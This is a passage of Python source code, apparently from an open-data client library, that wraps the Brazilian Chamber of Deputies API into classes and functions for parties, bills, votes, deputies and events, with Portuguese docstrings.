Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de discursos feitos por um deputado em eventos diversos.
----------------------------------------------------------------------
'''
params = {}
if tipo_evento is not None:
params['idTipoEvento'] = tipo_evento
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['orgaos', str(self.cod), 'eventos']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def membros(
self,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
index: bool = False
) -> _pd.DataFrame:
'''
Lista de cargos de um órgão e parlamentares que os ocupam.
Retorna uma lista de dados resumidos que identificam cada parlamentar
e o cargo ou posição que ocupa ou ocupou no órgão parlamentar durante
um certo período de tempo. Se não forem passados parâmetros que
delimitem esse período, o serviço retorna os membros do órgão no
momento da requisição. Se o órgão não existir mais ou não estiver
instalado, é retornada uma lista vazia.
Parâmetros
----------
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na “página” que se deseja obter com esta
requisição.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de cargos de um órgão e parlamentares que os ocupam.
----------------------------------------------------------------------
'''
params = {}
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
path = ['orgaos', str(self.cod), 'membros']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def votacoes(
self,
proposicao: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = False,
ordenar_por: str = 'dataHoraRegistro',
index: bool = False
) -> _pd.DataFrame:
'''
Uma lista de eventos com a participação do parlamentar.
Retorna uma lista de dados básicos de votações que tenham sido
realizadas em eventos realizados no órgão. Se este for um órgão
permanente da Câmara, são retornados, por padrão, dados sobre as
votações realizadas pelo órgão nos últimos 30 dias. Esse período pode
ser alterado com o uso dos parâmetros `inicio` e/ou `fim`, que por
enquanto são limitados a selecionar somente votações ocorridas em um
mesmo ano.
Caso este seja um órgão temporário, como uma comissão especial, são
listadas por padrão todas as votações ocorridas no órgão, em qualquer
período de tempo.
Dados complementares sobre cada votação listada podem ser obtidos com
o objeto `camara.Votacao`.
Parâmetros
----------
proposicao : int (default=None)
Código numérico da proposição, que podem ser obtidos por meio da
função `camara.lista_proposicoes`. Se presente, listará as
votações que tiveram a proposição como objeto de votação ou que
afetaram as proposições listadas.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=False)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraRegistro')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de discursos feitos por um deputado em eventos diversos.
----------------------------------------------------------------------
'''
params = {}
if proposicao is not None:
params['idProposicao'] = proposicao
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['orgaos', str(self.cod), 'votacoes']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
class Partido:
'''
Informações detalhadas sobre um partido.
Parâmetros
----------
cod : int
Código numérico do partido do qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico do partido.
facebook : str
URL da página no Facebook do partido.
legislatura : str
Código numérico da última legislatura.
lider : dict
Informações sobre o líder do partido.
logo : str
URL da logo do partido.
nome : str
Nome completo do partido.
numero : int
Número eleitoral do partido.
sigla : str
Sigla do partido.
situacao : str
Situação do partido.
total_membros : str
Total de membros do partido.
total_posse : str
Total de posse do partido.
ultima_atualizacao : str
Última atualização das informações sobre o partido.
uri : str
Endereço para coleta de dados direta pela API do partido.
uri_membros : str
Endereço para coleta de dados direta pela API dos membros do partido.
website : str
URL do website do partido.
Exemplos
--------
Obter o nome completo do partido #36899.
>>> p = camara.Partido(cod=36899)
>>> p.nome
... 'Movimento Democrático Brasileiro'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['partidos', str(cod)])['dados']
self.facebook = self.dados['urlFacebook']
self.legislatura = self.dados['status']['idLegislatura']
self.lider = self.dados['status']['lider']
self.logo = self.dados['urlLogo']
self.nome = self.dados['nome']
self.numero = self.dados['numeroEleitoral']
self.sigla = self.dados['sigla']
self.situacao = self.dados['status']['situacao']
self.total_membros = self.dados['status']['totalMembros']
self.total_posse = self.dados['status']['totalPosse']
self.ultima_atualizacao = self.dados['status']['data']
self.uri = self.dados['uri']
self.uri_membros = self.dados['status']['uriMembros']
self.website = self.dados['urlWebSite']
def __repr__(self):
return f"DadosAbertosBrasil.camara: {self.nome}"
def membros(
self,
inicio: str = None,
fim: str = None,
legislatura: int = None,
pagina: int = 1,
itens: int = None,
ordenar_por: str = None,
asc: bool = True,
index: bool = False
) -> _pd.DataFrame:
'''
Uma lista dos parlamentares de um partido durante um período.
Retorna uma lista de deputados que estão ou estiveram em exercício
pelo partido. Opcionalmente, pode-se usar os parâmetros `inicio`,
`fim` ou `legislatura` para se obter uma lista de deputados filiados
ao partido num certo intervalo de tempo. Isso é equivalente à função
`lista_deputados` com filtro por partido, mas é melhor para obter
informações sobre membros de partidos já extintos.
Parâmetros
----------
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
legislatura : int (default=None)
Número da legislatura, à qual os dados buscados devem corresponder.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default=None)
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista dos parlamentares de um partido durante um período.
----------------------------------------------------------------------
'''
params = {}
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
if legislatura is not None:
params['idLegislatura'] = legislatura
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
if ordenar_por is not None:
params['ordenarPor'] = ordenar_por
path = ['partidos', str(self.cod), 'membros']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
class Proposicao:
'''
Informações detalhadas sobre uma proposição específica.
Parâmetros
----------
cod : int
Código numérico da proposição da qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : int
Código numérico da proposição.
uri : str
Endereço para coleta de dados direta pela API da proposição.
tipo_sigla : str
Sigla do tipo de proposição.
tipo_codigo : int
Código numérico do tipo de proposição.
numero : int
Número da proposição.
ano : int
Ano da proposição.
ementa : str
Ementa da proposição.
apresentacao : str
Horário da apresentação da proposição no formato 'AAAA-MM-DD HH:MM'.
uri_orgao_numerador : str
Endereço para coleta de dados direta pela API do órgão numerador.
ultima_atualizacao : str
Data da última atualização do status da proposição.
sequencia : int
Sequência da proposição.
sigla_orgao : str
Sigla do órgão.
uri_orgao : str
Endereço para coleta de dados direta pela API do órgão.
uri_ultimo_relator : str
Endereço para coleta de dados direta pela API do último relaltor.
regime : str
Regime da proposição.
descricao_tramitacao : str
Descrição da tramitação.
cod_tipo_tramitacao : str
Código do tipo da tramitação.
descricao_situacao : str
Descrição da situação da proposição.
cod_situacao : int
Código númerico da situação da proposição.
despacho : str
Despacho.
url : str
URL da proposição.
ambito : str
Âmbito da proposição.
uri_autores : str
Endereço para coleta de dados direta pela API dos autores.
descricao_tipo : str
Descrição do tipo da proposição.
ementa_detalhada : str
Ementa detalhada da proposição.
keywords : str
Palavras-chaves da proposição.
uri_proposicao_principal : str
Endereço para coleta de dados direta pela API da proposição principal.
uri_proposicao_anterior : str
Endereço para coleta de dados direta pela API da proposição anterior.
uri_proposicao_posterior : str
Endereço para coleta de dados direta pela API da proposição posterior.
url_inteiro_teor : str
URL do inteiro teor.
urn_final : str
URN final.
texto : str
Texto da proposição.
justificativa : str
Justificativa da proposição.
Exemplos
--------
Obter a ementa da proposição #15990.
>>> prop = camara.Proposicao(cod=15990)
>>> prop.ementa
... ''Cria salvaguardas para a tecnologia no campo nuclear...'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['proposicoes', str(cod)])['dados']
self.uri = self.dados['uri']
self.tipo_sigla = self.dados['siglaTipo']
self.tipo_codigo = self.dados['codTipo']
self.numero = self.dados['numero']
self.ano = self.dados['ano']
self.ementa = self.dados['ementa']
self.apresentacao = self.dados['dataApresentacao']
self.uri_orgao_numerador = self.dados['uriOrgaoNumerador']
self.ultima_atualizacao = self.dados['statusProposicao']['dataHora']
self.sequencia = self.dados['statusProposicao']['sequencia']
self.sigla_orgao = self.dados['statusProposicao']['siglaOrgao']
self.uri_orgao = self.dados['statusProposicao']['uriOrgao']
self.uri_ultimo_relator = self.dados['statusProposicao']['uriUltimoRelator']
self.regime = self.dados['statusProposicao']['regime']
self.descricao_tramitacao = self.dados['statusProposicao']['descricaoTramitacao']
self.cod_tipo_tramitacao = self.dados['statusProposicao']['codTipoTramitacao']
self.descricao_situacao = self.dados['statusProposicao']['descricaoSituacao']
self.cod_situacao = self.dados['statusProposicao']['codSituacao']
self.despacho = self.dados['statusProposicao']['despacho']
self.url = self.dados['statusProposicao']['url']
self.ambito = self.dados['statusProposicao']['ambito']
self.uri_autores = self.dados['uriAutores']
self.descricao_tipo = self.dados['descricaoTipo']
self.ementa_detalhada = self.dados['ementaDetalhada']
self.keywords = self.dados['keywords']
self.uri_proposicao_principal = self.dados['uriPropPrincipal']
self.uri_proposicao_anterior = self.dados['uriPropAnterior']
self.uri_proposicao_posterior = self.dados['uriPropPosterior']
self.url_inteiro_teor = self.dados['urlInteiroTeor']
self.urn_final = self.dados['urnFinal']
self.texto = self.dados['texto']
self.justificativa = self.dados['justificativa']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Proposição {self.cod}"
def autores(self) -> _pd.DataFrame:
'''
Lista pessoas e/ou entidades autoras da proposição.
Retorna uma lista em que cada item identifica uma pessoa ou entidade
que é autora da proposição. Além de deputados, também podem ser
autores de proposições os senadores, a sociedade civil, assembleias
legislativas e os poderes Executivo e Judiciário.
Pelo Regimento da Câmara, todos os que assinam uma proposição são
considerados autores (art. 102), tanto os proponentes quanto os
apoiadores.
Para obter mais informações sobre cada autor, é recomendável acessar,
se disponível, a URL que é valor do campo uri.
Retorna
-------
pandas.core.frame.DataFrame
Lista pessoas e/ou entidades autoras da proposição.
----------------------------------------------------------------------
'''
path = ['proposicoes', str(self.cod), 'autores']
dados = _get(path=path, params=None)
return _df(dados, None)
def relacionadas(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Uma lista de proposições relacionadas a uma em especial.
Lista de informações básicas sobre proposições que de alguma forma se
relacionam com a proposição, como pareceres, requerimentos,
substitutivos, etc.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de proposições relacionadas a uma em especial.
----------------------------------------------------------------------
'''
path = ['proposicoes', str(self.cod), 'relacionadas']
dados = _get(path=path, params=None)
index_col = 'id' if index else None
return _df(dados, index_col)
def temas(
self,
index: bool = False
) -> _pd.DataFrame:
'''
Lista de áreas temáticas de uma proposição.
Lista em que cada item traz informações sobre uma área temática à qual
a proposição se relaciona, segundo classificação oficial do Centro de
Documentação e Informação da Câmara.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `codTema` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de áreas temáticas de uma proposição.
----------------------------------------------------------------------
'''
path = ['proposicoes', str(self.cod), 'temas']
dados = _get(path=path, params=None)
index_col = 'codTema' if index else None
return _df(dados, index_col)
def tramitacoes(
self,
inicio: str = None,
fim: str = None,
index: bool = False
) -> _pd.DataFrame:
'''
O histórico de passos na tramitação de uma proposta.
Lista que traz, como cada item, um “retrato” de informações que podem
ser alteradas a cada etapa de tramitação na vida da proposição (como
regime de tramitação e situação) e informações sobre o que causou esse
novo estado. Esta representação das tramitações ainda é provisória.
Parâmetros
----------
inicio : str (default=None)
Data de início da tramitação, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término da tramitação, no formato 'AAAA-MM-DD'.
index : bool (default=False)
Se True, define a coluna `sequencia` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de passos na tramitação de uma proposta.
----------------------------------------------------------------------
'''
params = {}
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
path = ['proposicoes', str(self.cod), 'tramitacoes']
dados = _get(path=path, params=params)
index_col = 'sequencia' if index else None
return _df(dados, index_col)
def votacoes(
self,
asc: bool = False,
ordenar_por: str = 'dataHoraRegistro',
index: bool = False
) -> _pd.DataFrame:
'''
Informações detalhadas de votações sobre a proposição.
Retorna uma lista de identificadores básicos sobre as votações na
Câmara que tiveram a proposição como objeto ou como afetada pelos seus
resultados. Dados complementares sobre cada votação listada podem ser
obtidos pelo objeto `camara.Votacao`.
Parâmetros
----------
asc : bool (default=False)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraRegistro')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de votações sobre a proposição.
----------------------------------------------------------------------
'''
params = {}
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
path = ['proposicoes', str(self.cod), 'votacoes']
dados = _get(path=path, params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
class Votacao:
'''
Informações detalhadas sobre uma votação da Câmara.
Retorna um conjunto detalhado de dados sobre a votação, tais como as
proposições que podem ter sido o objeto da votação e os efeitos de
tramitação de outras proposições que eventualmente tenham sido cadastrados
em consequência desta votação.
Parâmetros
----------
cod : str
Código alfa-numérico da votação da qual se deseja informações.
Atributos
---------
dados : dict
Conjunto completo de dados.
cod : str
Código alfa-numérico da votação.
aprovacao : int
Aprovação da votação.
data : str
Data da votação.
data_regitro : str
Data e horário de registro da votação.
data_ultima_abertura : str
Data e horário da última abertura da votação.
descricao : str
Descrição da votação.
efeitos_registrados : list
Lista de efeitos registrados.
evento : int
Código numérico do evento da votação.
orgao : int
Código numérico do órgão da votação.
objetos_possiveis : list of dict
Lista de objetos possíveis.
proposicoes_afetadas : str
Proposições afetadas.
sigla_orgao : str
Sigla do órgão.
ultima_apresentacao_proposicao : dict
Última apresentação da proposição.
uri : str
Endereço para coleta de dados direta pela API da votação.
uri_evento : str
Endereço para coleta de dados direta pela API do evento.
uri_orgao : str
Endereço para coleta de dados direta pela API do órgão.
Exemplos
--------
Obter a data da votação #2265603-43.
>>> vot = camara.Votacao(cod='2265603-43')
>>> vot.data
... '2020-12-22'
--------------------------------------------------------------------------
'''
def __init__(self, cod:int):
self.cod = cod
self.dados = _get(['votacoes', str(cod)])['dados']
self.aprovacao = self.dados['aprovacao']
self.data = self.dados['data']
self.data_regitro = self.dados['dataHoraRegistro']
self.data_ultima_abertura = self.dados['dataHoraUltimaAberturaVotacao']
self.descricao = self.dados['descricao']
self.efeitos_registrados = self.dados['efeitosRegistrados']
self.evento = self.dados['idEvento']
self.orgao = self.dados['idOrgao']
self.objetos_possiveis = self.dados['objetosPossiveis']
self.proposicoes_afetadas = self.dados['proposicoesAfetadas']
self.sigla_orgao = self.dados['siglaOrgao']
self.ultima_apresentacao_proposicao = self.dados['ultimaApresentacaoProposicao']
self.uri = self.dados['uri']
self.uri_evento = self.dados['uriEvento']
self.uri_orgao = self.dados['uriOrgao']
def __repr__(self):
return f"DadosAbertosBrasil.camara: Votação {self.cod}"
def orientacoes(self, index=False) -> _pd.DataFrame:
'''
O voto recomendado pelas lideranças aos seus deputados na votação.
Em muitas votações, os líderes de partidos e blocos – as bancadas –
fazem recomendações de voto para seus parlamentares. Essas orientações
de uma votação também são feitas pelas lideranças de Governo, Minoria
e as mais recentes Maioria e Oposição. Uma liderança também pode
liberar a bancada para que cada deputado vote como quiser, ou entrar
em obstrução, para que seus parlamentares não sejam contados para o
quórum da votação.
Se a votação teve orientações, este recurso retorna uma lista em que
cada item contém os identificadores de um partido, bloco ou liderança,
e o posicionamento ou voto que foi recomendado aos seus parlamentares.
Até o momento, só estão disponíveis dados sobre orientações dadas em
votações no Plenário.
Parâmetros
----------
index : bool (default=False)
Se True, define a coluna `codPartidoBloco` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de recomendações pelas lideranças aos seus deputados.
----------------------------------------------------------------------
'''
path = ['votacoes', str(self.cod), 'orientacoes']
dados = _get(path=path, params=None)
index_col = 'codPartidoBloco' if index else None
return _df(dados, index_col)
def votos(self) -> _pd.DataFrame:
'''
Como cada parlamentar votou em uma votação nominal e aberta.
Se a votação da Câmara é nominal e não foi secreta, retorna uma lista
em que cada item contém os identificadores básicos de um deputado e o
voto ou posicionamento que ele registrou.
O resultado é uma lista vazia se a votação foi uma votação simbólica,
em que os votos individuais não são contabilizados. Mas há algumas
votações simbólicas que também têm registros de "votos": nesses casos,
normalmente se trata de parlamentares que pediram expressamente que
seus posicionamentos fossem registrados.
Não são listados parlamentares ausentes à votação.
Retorna
-------
pandas.core.frame.DataFrame
Lista de parlamentares.
----------------------------------------------------------------------
'''
path = ['votacoes', str(self.cod), 'votos']
dados = _get(path=path, params=None)
return _df(dados, None)
def lista_blocos(
legislatura: int = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'nome',
index: bool = False
) -> _pd.DataFrame:
'''
Lista de dados sobre os blocos partidários.
Nas atividades parlamentares, partidos podem se juntar em blocos
partidários. Quando associados, os partidos passam a trabalhar como se
fossem um "partidão", com um só líder e um mesmo conjunto de vice-líderes.
Os blocos só podem existir até o fim da legislatura em que foram criados:
na legislatura seguinte, os mesmos partidos, se associados, formam um novo
bloco. Este recurso é uma lista dos blocos em atividade no momento da
requisição. Se forem passados números de legislaturas com o parâmetro
`legislatura`, são listados também os blocos formados e extintos nessas
legislaturas.
Parâmetros
----------
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='nome')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de dados sobre os blocos partidários.
--------------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='blocos', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_deputados(
nome: str = None,
legislatura: int = None,
uf: str = None,
partido: str = None,
sexo: str = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'nome',
index: bool = False
) -> _pd.DataFrame:
'''
Listagem e busca de deputados, segundo critérios.
Retorna uma lista de dados básicos sobre deputados que estiveram em
exercício parlamentar em algum intervalo de tempo. Se não for passado um
parâmetro de tempo, como `legislatura` ou `inicio`, a lista enumerará
somente os deputados em exercício no momento da requisição.
Parâmetros
----------
nome : str (default=None)
Parte do nome dos parlamentares.
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
uf : str (default=None)
Sigla da unidade federativa (estados e Distrito Federal).
Se None, serão retornados deputados de todos os estados.
partido : str (default=None)
Sigla do partido ao qual sejam filiados os deputados.
Para obter as siglas válidas, consulte a função `camara.lista_partidos`.
Atenção: partidos diferentes podem usar a mesma sigla em diferentes
legislaturas.
sexo : str (default=None)
Letra que designe o gênero dos parlamentares que se deseja buscar,
- 'M': Masculino;
- 'F': Feminino.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='nome')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de deputados.
--------------------------------------------------------------------------
'''
params = {}
if nome is not None:
params['nome'] = nome
if legislatura is not None:
params['idLegislatura'] = legislatura
if uf is not None:
params['siglaUf'] = parse.uf(uf)
if partido is not None:
params['siglaPartido'] = partido
if sexo is not None:
params['siglaSexo'] = sexo
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='deputados', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_eventos(
tipo_evento: int = None,
situacao: int = None,
tipo_orgao: int = None,
orgao: int = None,
inicio: str = None,
fim: str = None,
hora_inicio: str = None,
hora_fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'dataHoraInicio',
index: bool = False
) -> _pd.DataFrame:
'''
Lista de eventos ocorridos ou previstos nos diversos órgãos da Câmara.
Retorna uma lista cujos elementos trazem informações básicas sobre eventos
dos órgãos legislativos da Câmara, previstos ou já ocorridos, em um certo
intervalo de tempo. Esse intervalo pode ser configurado pelos parâmetros
de data e hora listados abaixo. Se nenhum for passado, são listados
eventos dos cinco dias anteriores, dos cinco dias seguintes e do próprio
dia em que é feita a requisição.
Parâmetros
----------
tipo_evento : int (default=None)
Identificador numérico do tipo de evento que se deseja obter.
Os valores válidos podem ser obtidos pela função
`camara.referencias('tiposEvento')`.
situacao : int (default=None)
Identificador numéricos do tipo de situação de evento.
Valores válidos podem ser obtidos pela função
`camara.referencias('situacoesEvento')`.
tipo_orgao : int (default=None)
Identificador numérico do tipo de órgão realizador dos eventos que se
deseja obter. Os valores válidos podem ser obtidos pela função
`camara.referencias('tiposOrgao').
orgao : int (default=None)
Identificador numérico do órgão. Os identificadores podem ser obtidos
pela função `camara.lista_orgaos`.
inicio : str (default=None)
Data de início de um intervalo de tempo, no formato 'AAAA-MM-DD'.
fim : str (default=None)
Data de término de um intervalo de tempo, no formato 'AAAA-MM-DD'.
hora_inicio : str (default=None)
Hora inicial de um intervalo de tempo, no formato 'HH:MM', em horário
de Brasília.
hora_fim : str (default=None)
Hora final de um intervalo de tempo, no formato 'HH:MM', em horário
de Brasília.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=True)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='dataHoraInicio')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de eventos ocorridos ou previstos nos diversos órgãos da
Câmara.
--------------------------------------------------------------------------
'''
params = {}
if tipo_evento is not None:
params['codTipoEvento'] = tipo_evento
if situacao is not None:
params['codSituacao'] = situacao
if tipo_orgao is not None:
params['codTipoOrgao'] = tipo_orgao
if orgao is not None:
params['idOrgao'] = orgao
if inicio is not None:
params['dataInicio'] = parse.data(inicio, 'camara')
if fim is not None:
params['dataFim'] = parse.data(fim, 'camara')
if hora_inicio is not None:
params['horaInicio'] = hora_inicio
if hora_fim is not None:
params['horaFim'] = hora_fim
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='eventos', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_frentes(
legislatura: int = None,
pagina: int = 1,
index: bool = False
) -> _pd.DataFrame:
'''
Lista de frentes parlamentares de uma ou mais legislaturas.
Retorna uma lista de informações sobre uma frente parlamentar - um
agrupamento oficial de parlamentares em torno de um determinado tema ou
proposta. As frentes existem até o fim da legislatura em que foram
criadas, e podem ser recriadas a cada legislatura. Algumas delas são
compostas por deputados e senadores.
Um número de legislatura pode ser passado como parâmetro, mas se for
omitido são retornadas todas as frentes parlamentares criadas desde 2003.
Parâmetros
----------
legislatura : int (default=None)
Número da legislatura a qual os dados buscados devem corresponder.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de frentes parlamentares de uma ou mais legislaturas.
--------------------------------------------------------------------------
'''
params = {}
if legislatura is not None:
params['idLegislatura'] = legislatura
params['pagina'] = pagina
dados = _get(path='frentes', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_legislaturas(
data: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = False,
ordenar_por: str = 'id',
index: bool = False
) -> _pd.DataFrame:
'''
Os períodos de mandatos e atividades parlamentares da Câmara.
Legislatura é o nome dado ao período de trabalhos parlamentares entre uma
eleição e outra. Esta função retorna uma lista em que cada item contém as
informações básicas sobre um desses períodos. Os números que identificam
as legislaturas são sequenciais, desde a primeira que ocorreu.
Parâmetros
----------
data : str (default=None)
Data no formato 'AAAA-MM-DD'. Se este parâmetro estiver presente, a
função retornará as informações básicas sobre a legislatura que estava
em curso na data informada.
pagina : int (default=1)
Número da página de resultados, a partir de 1, que se deseja
obter com a requisição, contendo o número de itens definido
pelo parâmetro `itens`. Se omitido, assume o valor 1.
itens : int (default=None)
Número máximo de itens na página que se deseja obter com esta
requisição.
asc : bool (default=False)
Se os registros são ordenados no sentido ascendente:
- True: De A a Z ou 0 a 9 (ascendente);
- False: De Z a A ou 9 a 0 (descendente).
ordenar_por : str (default='id')
Qual dos elementos da representação deverá ser usado para aplicar
ordenação à lista.
index : bool (default=False)
Se True, define a coluna `id` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista de legislaturas da Câmara.
--------------------------------------------------------------------------
'''
params = {}
if data is not None:
params['data'] = data
params['pagina'] = pagina
if itens is not None:
params['itens'] = itens
params['ordem'] = 'asc' if asc else 'desc'
params['ordenarPor'] = ordenar_por
dados = _get(path='legislaturas', params=params)
index_col = 'id' if index else None
return _df(dados, index_col)
def lista_orgaos(
sigla: str = None,
tipo: int = None,
inicio: str = None,
fim: str = None,
pagina: int = 1,
itens: int = None,
asc: bool = True,
ordenar_por: str = 'id',
index: bool = False
) -> _pd.DataFrame:
'''
Lista das comissões e outros órgãos legislativos da Câmara.
Retorna uma lista de informações básicas sobre os órgãos legislativos e
